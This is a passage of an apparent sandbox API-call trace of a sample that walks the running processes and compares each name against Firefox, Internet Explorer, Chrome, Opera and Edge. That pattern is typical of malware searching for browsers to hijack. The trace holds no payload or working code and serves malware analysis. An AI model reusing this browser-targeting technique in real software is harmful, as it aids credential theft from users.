lpString2="firefox.exe") returned 1 [0187.423] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.423] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.423] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.423] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.424] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.424] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.424] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.424] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.424] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.424] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0187.424] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0187.424] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0187.425] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0187.425] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.425] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0187.425] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0187.425] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0187.425] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0187.425] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.426] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0187.426] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0187.426] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0187.426] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0187.426] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.426] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.426] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.426] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.426] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.426] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.427] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0187.427] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0187.427] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0187.427] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0187.427] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0187.428] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0187.428] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0187.428] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0187.428] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0187.428] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0187.428] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0187.428] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0187.428] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0187.428] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0187.428] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0187.429] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0187.429] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0187.429] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0187.429] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0187.429] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0187.429] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0187.429] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0187.429] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0187.429] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0187.429] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0187.430] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0187.430] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0187.430] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0187.430] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0187.430] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0187.430] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0187.430] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0187.431] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0187.431] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0187.431] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.431] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0187.431] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0187.431] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0187.431] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0187.431] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0187.431] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.431] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0187.432] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0187.432] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0187.432] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0187.432] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0187.432] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0187.432] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0187.432] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0187.432] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0187.432] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0187.432] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.432] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0187.433] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0187.433] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0187.433] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0187.433] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0187.433] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.433] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0187.434] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0187.434] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0187.434] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0187.434] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0187.434] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.434] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0187.434] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0187.434] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0187.434] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0187.434] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0187.434] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.434] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0187.435] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0187.435] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0187.435] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0187.435] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0187.435] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0187.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0187.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0187.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0187.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0187.435] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.435] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0187.436] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0187.436] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0187.436] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0187.436] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0187.436] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.436] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0187.436] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0187.437] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0187.437] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0187.437] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0187.437] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.437] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0187.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0187.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0187.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0187.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0187.437] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.437] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0187.438] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0187.438] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0187.438] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0187.438] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0187.438] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0187.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0187.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0187.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0187.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0187.438] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.438] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0187.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0187.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0187.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0187.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0187.439] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.439] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0187.439] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0187.439] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0187.439] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0187.440] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0187.440] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.440] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0187.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0187.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0187.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0187.440] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.440] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.441] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.441] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.441] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.441] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.441] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0187.441] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0187.441] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0187.441] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0187.441] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0187.441] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.441] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.442] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.442] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.442] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.442] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.442] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.442] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0187.442] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0187.442] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0187.442] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0187.442] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0187.442] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.443] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.443] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0187.443] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0187.443] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0187.443] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0187.443] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.443] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.444] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.444] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.444] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.444] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0187.444] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0187.444] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0187.444] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0187.444] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0187.444] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0187.444] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.445] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0187.445] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0187.445] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0187.445] lstrcmpiA 